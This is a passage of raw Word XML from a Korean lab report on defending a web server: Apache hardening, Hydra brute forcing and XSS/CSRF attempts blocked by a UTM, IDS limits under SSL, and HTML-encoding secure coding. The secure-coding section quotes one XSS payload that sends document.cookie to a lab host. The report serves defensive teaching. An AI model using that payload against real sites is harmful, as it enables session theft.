        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C67042" w:rsidRDefault="00C67042" w:rsidP="00C67042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2D2EB020" wp14:editId="7327747E">
            <wp:extent cx="3557270" cy="1454727"/>
            <wp:effectExtent l="0" t="0" r="508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20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92" cy="1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90573" wp14:editId="1B42DF47">
            <wp:extent cx="3524597" cy="9918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21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33" cy="1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AA78E3" wp14:editId="35EC9566">
            <wp:extent cx="3364302" cy="975965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22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99" cy="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P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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">서비스 기본 경로인 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>irectory</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Indexes </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>옵션을 제거</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">한 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>뒤 다시 공격해보면 D</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>irectory listing</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 접근이 금지된 것을 확인 가능 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502E0B" w:rsidRDefault="00502E0B" w:rsidP="00502E0B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43D960" wp14:editId="74F722A5">
            <wp:extent cx="4519535" cy="773083"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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6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6" cy="7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54A3C3" wp14:editId="0C1B4197">
            <wp:extent cx="2700067" cy="822221"/>
            <wp:effectExtent l="0" t="0" r="508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7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75" cy="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7DC619" wp14:editId="0E259BE8">
            <wp:extent cx="2050394" cy="1579418"/>
            <wp:effectExtent l="0" t="0" r="762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18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15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B" w:rsidRDefault="00502E0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502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/e</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tc/httpd/conf/httpd.conf </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">파일에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr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Signature </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">옵션을 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Off</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 설정하면 상세하게 서버 정보를 보여주던 부분이 더 이상 보이지 않는 것을 확인할 수 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">있고 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">404 </w:t>
      </w:r>
      <w:r w:rsidRPr="00502E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>페이지에서 하단에 보이던 아파치 버전도 숨겨짐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2E0B" w:rsidRPr="00AC03BE" w:rsidRDefault="00A24DB6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D / Password </w:t>
      </w:r>
      <w:r w:rsidR="0068217C" w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="0068217C" w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rute Forcing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0EBA6BAB" wp14:editId="20C14050">
            <wp:extent cx="4804410" cy="340822"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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01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3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15B2" wp14:editId="4E042122">
            <wp:extent cx="4787900" cy="307571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002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48" cy="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1B27E3" wp14:editId="12D5F3A7">
            <wp:extent cx="4787900" cy="448310"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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4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88" cy="4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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hydr</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a를 이용한 공격이 제대로 이루어지지 않고 </w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UTM</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 h</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ydra</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 의한 공격이 있었다는 로그가 남음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068217C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61FE09FA" wp14:editId="69D19548">
            <wp:extent cx="3937000" cy="157942"/>
            <wp:effectExtent l="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21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00" cy="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FE9EE3" wp14:editId="182247E7">
            <wp:extent cx="3959245" cy="1762298"/>
            <wp:effectExtent l="0" t="0" r="3175" b="952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22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90" cy="1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B</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rute Forcing</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 경우 요청의 빈도에 의해 I</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서 탐지할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00924F61" w:rsidRDefault="00924F61">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068217C" w:rsidRPr="0068217C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X</w:t>
      </w:r>
      <w:r>
        <w:t>SS(Cross Site Script)</w:t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78EC923" wp14:editId="5BC70B92">
            <wp:extent cx="2204282" cy="1238597"/>
            <wp:effectExtent l="0" t="0" r="5715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003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08" cy="12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A68EC9" wp14:editId="3CC088F1">
            <wp:extent cx="2617313" cy="1221971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004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09" cy="12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68217C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005325E2" wp14:editId="10E0FE29">
            <wp:extent cx="4829175" cy="773083"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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005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97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7C" w:rsidRDefault="0068217C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68217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SS</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>도 공격이 제대로 이루어 지지 않고</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>요청이 금지 되었다는 페이지를 확인할 수 있고 U</w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TM </w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로그를 확인하면 요청한 내용이 </w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="0068217C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격으로 탐지되어 방어 되었다는 기록을 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC03BE" w:rsidRDefault="00AC03BE" w:rsidP="00AC03BE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3E87B60C" wp14:editId="775FC1A6">
            <wp:extent cx="3931610" cy="182880"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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25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71" cy="1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65A1D" wp14:editId="116BC73B">
            <wp:extent cx="3960000" cy="2390400"/>
            <wp:effectExtent l="0" t="0" r="254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-026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IDS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>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 탐지는 웹 서버가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">통신을 이용하기 때문에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이 암호화되어 탐지 불가능</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, UTM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">장비의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https redirect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 이용해 내부 네트워크는 암호화하지 않은 통신을 한다면 위 사진과 같은 결과를 확인 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC03BE" w:rsidRDefault="00AC03BE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00846015" w:rsidRDefault="009C7634" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XSS (Secure Coding, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>예시</w:t>
      </w:r>
      <w:r>
        <w:t>)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취약점의 경우 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">html </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 통해서 방지할 수 있는데 웹 페이지가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 xml:space="preserve">작성된 파일의 코드 내에서 악성 스크립트 공격에 이용될 수 있는 글자를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으로 바꿔주면서 스크립트 코드가 실행이 되지 않고 그 코드 글자 그대로를 저장하고 출력할 수 있도록 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>변환</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRDefault="009C7634" w:rsidP="009C7634">
      <w:pPr>
        <w:ind w:left="804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6744C53" wp14:editId="06A0C8C6">
            <wp:extent cx="3960000" cy="1375200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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-048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입력 받은 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strContent</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cript&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t;script&amp;gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>html Encodin</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">해서 저장하거나 아니면 저장된 텍스트를 받을 때 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>html Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 해서 화면에 보여주도록 할 수도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위에서 작성한 코드로는 대문자로 이루어졌거나 대소문자가 섞인 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">태그와 같이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Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 처리를 우회하는 공격은 처리할 수 없기 때문에 공격 가능성이 있는 텍스트를 확인해서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ltering</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 할 수 있는 작업이 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>필요</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(ex.  </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eplace </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>대소문자 구분 없이,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> replace(strContent, "&lt;script&gt;", "&amp;lt;script&amp;gt;", 1, -1, vbTextCompare) )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X</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SS </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격이 가능한 스크립트 코드에 대한 정보는 관련 사이트를 참고해서 서비스에 영향이 없는 선에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">htm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ncoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 해줄 필요가 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>있음</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rStyle w:val="af4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:footnoteReference w:id="2"/>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ex. &lt;body onload = "i.src = 'http://10.10.10.20/getcookie.php?cookie = '+document.cookie"&gt; 과 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">같이 </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scrip</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t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태그 없이도 공격 가능한 코드를 작성할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7634" w:rsidRDefault="009C7634">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068217C" w:rsidRPr="00AC03BE" w:rsidRDefault="0068217C" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>SRF(</w:t>
      </w:r>
      <w:r w:rsidR="00AC03BE" w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cross Site Request Forgery</w:t>
      </w:r>
      <w:r>
        <w:t>)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6F2D07C" wp14:editId="6C350182">
            <wp:extent cx="3958907" cy="1978429"/>
            <wp:effectExtent l="0" t="0" r="3810" b="317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006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02" cy="19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E26501" wp14:editId="364996D4">
            <wp:extent cx="3960000" cy="846000"/>
            <wp:effectExtent l="0" t="0" r="254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007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FC0A3D" wp14:editId="1C21C444">
            <wp:extent cx="3960000" cy="684000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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08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위</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 사진에서 알 수 있듯이</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 마찬가지로 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격도 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC03BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용한 공격으로 간주 방어가 되는 것을 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인 가능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4E15E7C5" wp14:editId="39694250">
            <wp:extent cx="3937000" cy="133003"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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-027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83" cy="1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319BD" wp14:editId="515F09C0">
            <wp:extent cx="3960000" cy="2440800"/>
            <wp:effectExtent l="0" t="0" r="254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-028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SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">와 마찬가지로 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">통신 때문에 암호화되어 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>은 확인 불가능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U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
